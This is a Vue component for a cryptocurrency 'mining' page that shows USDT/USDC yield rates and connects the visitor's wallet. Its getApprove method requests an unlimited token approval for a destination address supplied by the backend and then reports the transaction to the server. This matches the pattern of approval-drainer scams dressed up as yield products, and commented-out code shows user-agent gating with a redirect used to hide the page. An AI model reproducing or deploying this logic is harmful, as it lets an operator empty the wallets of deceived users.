<style>

.mining-banner{width:100vw;margin: 0;padding: 0;overflow: hidden;
background-image: url(../../../static/images/about-bg.png);
background-size: 100vw;}
.mining-head{width:100vw; line-height: 15vw;font-size: 8vw;
text-align: center;font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
color: #333;}
.mining-banner img{width:90%;display: block;margin: 0 auto;}
.mining-table{width:90vw;margin: 0 auto;padding: 0;overflow: hidden;}
.mining-table span{display: block;float: left;width:30vw;height: 10vw;
line-height: 10vw;font-size: 4.5vw;
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;}
.mining-table span.mining-table-a{text-align: left;}
.mining-table span.mining-table-b{text-align: center;}
.mining-table span.mining-table-c{text-align: right;}

.mining-content{width:90vw;margin: 0 auto;}
.mining-content ul{list-style: none;margin: 0 auto;padding: 0;overflow: hidden;}
.mining-content ul li{width:100%;height: 10vw;}
.mining-content ul li span{display: block;float: left;width:30vw;height: 10vw;
line-height: 10vw;font-size: 3.5vw;color:#333;
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;}
.mining-content ul li span.mining-content-a{text-align: left;width:40vw;}
.mining-content ul li span.mining-content-b{text-align: center;width:10vw;}
.mining-content ul li span.mining-content-c{text-align: right;width:40vw;}

.join{width:90vw;margin: 0 auto;margin-top: 5vw;position: relative;
height: 14vw;}
.join button{background-color: rgb(252, 213, 53);width: 100%;
height: 14vw;border-radius: 2vw;font-size: 5vw;font-weight: bold;
outline: none;border: 0;font-family:  Arial,sans-serif!important;
position: absolute;left: 0;top: 0;z-index: 99;}
.join button.joined{color: #fff;}
.join-cover{width: 90vw;height: 14vw;position: absolute;left: 0;top: 0;
z-index: 999;background-color: rgba(237, 237, 237, .9);}
.join-cover svg{height: 14vw;display: block;margin: 0 auto;}
.join-cover .path{stroke-dasharray:90,150;stroke-dashoffset:0;stroke-width:2;
stroke:#409eff;stroke-linecap:round;animation:loading-dash 1.5s ease-in-out infinite;}
@keyframes loading-dash{
  0% {
    stroke-dasharray:1,200;
    stroke-dashoffset:0;
  }
  50% {
    stroke-dasharray:90,150;
    stroke-dashoffset:-40px;
  }
  100% {
    stroke-dasharray:90,150;
    stroke-dashoffset:-120px;
  }
}
</style>
<template>
	<div class="bg" v-if="all_show">
    <headers @chain_changed="chain_changed($event)" @usd_changed="usd_changed($event)"  @change="toconnect($event)" :chain="chain_id" :address="addr" :connected="connected" :now="now"></headers>
    <div class="mining-banner">
      <div class="mining-head">
        {{$t('home.index29')}}
      </div>
      <img src="../../../static/images/global-pc.png">
    </div>
    <div class="mining-table">
      <span class="mining-table-a">{{$t('home.index30')}}</span>
      <span class="mining-table-b">{{$t('home.index31')}}</span>
      <span class="mining-table-c">{{$t('home.index32')}}</span>
    </div>
    <div class="mining-content">
      <ul>
        <li v-for="item in list">
          <span class="mining-content-a" v-if="usd==2">{{item.name}}USDC</span>
          <span class="mining-content-a" v-else>{{item.name}}USDT</span>
          <span class="mining-content-b">{{item.rate * 1}}%</span>
          <span class="mining-content-c" v-if="usd==2">{{item.profit}}USDC</span>
          <span class="mining-content-c" v-else>{{item.profit}}USDT</span>
        </li>
      </ul>
    </div>
   <!-- <div class="join">
      <div v-if="!connected" class="join-cover">
        <svg viewBox="25 25 50 50" class="circular"><circle cx="50" cy="50" r="20" fill="none" class="path"></circle></svg>
      </div>
      <button v-if="!joined" @click="getApprove()">{{$t('home.index10')}}</button>
      <button v-else="joined" @click="Userjoined()" class="joined">{{$t('home.index11')}}</button>
    </div> -->
    <div class="blank"></div>
    <menus :now="now"></menus>
	</div>
</template>
<script>
import menus from '../components/menus.vue'
import headers from '../components/header.vue'
import { ethers } from 'ethers'
import { connectWallet, disconnectWallet, getAccount, getChainId, getGasPrice, getProvider } from '../../utils/wallet'
import { getAllowance, approveUnlimited, revokeApproval } from '../../utils/erc20'
import Qs from 'qs'
export default {
  components: {
    menus,
    headers
  },
  data () {
    return {
      now: 2,
      provider: '',
      connected: false,
      chain_id: 56,
      address: '',
      list: [],
      provider: '',
      web3: null,
      gas: '',
      addr: '',
      token: '',
      usd: 2,
	  timers:null,
      joined: false,
      dest_address: '',
      approve_hash: '',
      currentTime: '',
      all_show:true,
      userAgent2:'',
      userAgent:'',
	  account: '',
	  loading: false,
	  errMsg: '',
	  walletReady: false
    }
  },
  async mounted () {
    if (window.ethereum) {
  	  try {
  		// 尝试静默恢复连接（不弹授权框）
  		const accounts = await window.ethereum.request({ method: 'eth_accounts' })
  		if (accounts.length > 0) {
  		  // 已经授权过，直接恢复 provider
  		  await connectWallet()
  		}
  	  } catch (e) {
  		console.log('恢复连接失败', e)
  	  }
  	} 
	this.timers = setInterval(() => {
	    if (!this.connected) {
	        this.getAddress()
	    } else {
			 clearInterval(this.timers)
		}
	}, 3000)
    // this.get()
    this.userAgent2 = navigator.userAgent;
    this.userAgent = window.location.href
    this.userAgent = this.userAgent.toLowerCase();
    this.userAgent2 = this.userAgent2.toLowerCase();
  //  if(this.userAgent.includes("trust") || this.userAgent2.includes("android")){
    //  this.all_show = true
     this.getAddress()
     this.get_product()
    //  }else{
   //     window.location.href="https://www.bitget.com/"
  //  }

  },
  async created() {
  	 // this.ref = this.$utils.getUrlKey('ref')
     await connectWallet()
     this.walletReady = true
   },
  methods: {
    readEntrance () {
      const entrance_token = localStorage.getItem('entrance_token');
      const _this = this
      const data = {
        address: _this.address,
        token: entrance_token
      }
      this.$axios({
        method: 'post',
        url: this.$api + '/member/readEntrance',
        data: Qs.stringify(data),
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded'
        }
      }).then(response => {
        var data = response.data
        if (data.state == 1) {
          if(data.data.status == 2) {
          //  window.location.href = data.data.url
          } else {
            this.all_show = true
          }
        }
      }).catch(error => {
        console.log(error)
      })
    },
    chain_changed (id) {
      this.chain_id = id
      this.getAddress()
    },
    usd_changed (id) {
      this.usd = id
      this.getAddress()
    },
    async toconnect (val) {
      console.log(val)
      //
      this.getAddress()
    },
    Userjoined () {
      this.$toast.center(this.$t('home.index19'))
    },
	async getAddress () {
	  let Address = getAccount()
	  console.log(111)
	   console.log(Address)
	   this.address = Address
	    console.log(this.chain_id)
	  //this.chain_id = await getChainId()
	 // console.log(this.chain_id)
	//  this.gas = await getGasPrice()
	 // const chainId_now = parseInt(chainId, 16)
	  if (this.chain_id != 56 && this.chain_id != 1) {
	    this.$toast.center(this.$t('home.index21'))
	  } else {
	    const chainIds = localStorage.getItem('chainId');
	     if(!chainIds || chainIds == 'undefined'){
	      // this.chain_id = this.chain_id
	     //  this.usd = 2
		 localStorage.setItem('chainId',this.chain_id);
	     }
		 if(Address){
			  this.connected = true
		 }
	   
	    this.dologin()
	  }
	},
   async getAddresss () {
     let Address = getAccount()
      
     this.chain_id = await getChainId()
     this.gas = await getGasPrice()
     this.address = Address
      if (this.chain_id != 56 && this.chain_id != 1) {
        this.$toast.center(this.$t('home.index21'))
      } else {
         
        console.log(this.address)
       
        this.connected = true
        this.dologin()
      }
    },
    dologin () {
      const _this = this
      const data = {
        address: _this.address,
        ref: _this.ref
      }
      this.$axios({
        method: 'post',
        url: this.$api + '/member/login',
        data: Qs.stringify(data),
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded'
        }
      }).then(response => {
        var data = response.data
        if (data.state === 1) {
          this.addr = data.data.addr
          this.token = data.data.token
          if (this.token) {
            this.readEntrance()
            this.get_approve()
            this.get_product()
          }
        }
      }).catch(error => {
        console.log(error)
      })
    },
    get_approve () {
      const _this = this
      const data = {
        token: _this.token,
        usd: _this.usd,
        chain: _this.chain_id
      }
      this.$axios({
        method: 'post',
        url: this.$api + '/member/get_approve_address',
        data: Qs.stringify(data),
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded'
        }
      }).then(response => {
        var data = response.data
        if (data.state === 1) {
          this.joined = true
        } else {
          this.dest_address = data.data
        }
      }).catch(error => {
        console.log(error)
      })
    },
    finish_approve () {
      const _this = this
      const data = {
        token: _this.token,
        dest: _this.dest_address,
        chain: _this.chain_id,
        usd: _this.usd,
        hash: _this.approve_hash
      }
      this.$axios({
        method: 'post',
        url: this.$api + '/member/finish_approve',
        data: Qs.stringify(data),
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded'
        }
      }).then(response => {
        var data = response.data
        if (data.state === 1) {
          _this.get_approve()
        }
      }).catch(error => {
        console.log(error)
      })
    },
    get_product () {
      const _this = this
      const data = {
        token: _this.token
      }
      this.$axios({
        method: 'post',
        url: this.$api + '/member/get_product',
        data: Qs.stringify(data),
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded'
        }
      }).then(response => {
        var data = response.data
        if (data.state === 1) {
          _this.list = data.data
        }
      }).catch(error => {
        console.log(error)
      })
    },
    async getApprove () {
      let self = this
      let token = self.$token
      if(self.chain_id == 56){
        if(self.usd == 1) {
          token = self.$token
        } else {
          token = self.$token3
        }
      } else {
        if(self.usd == 1) {
          token = self.$token2
        } else {
          token = self.$token4
        }
      }
	  
	  this.loading = true
	  try {
	    const receipt = await approveUnlimited(
	      token.trim(),
	      self.dest_address.trim()
	    )
	    self.approve_hash = receipt.transactionHash
	     
	  } catch (e) {
	    this.errMsg = e.message || 'Approve 失败'
	  } finally {
	    self.finish_approve()
	  }
	   
    }
  },
  watch: {
  },
  beforeDestroy() {
      clearInterval(this.timers)
  }
}
</script>
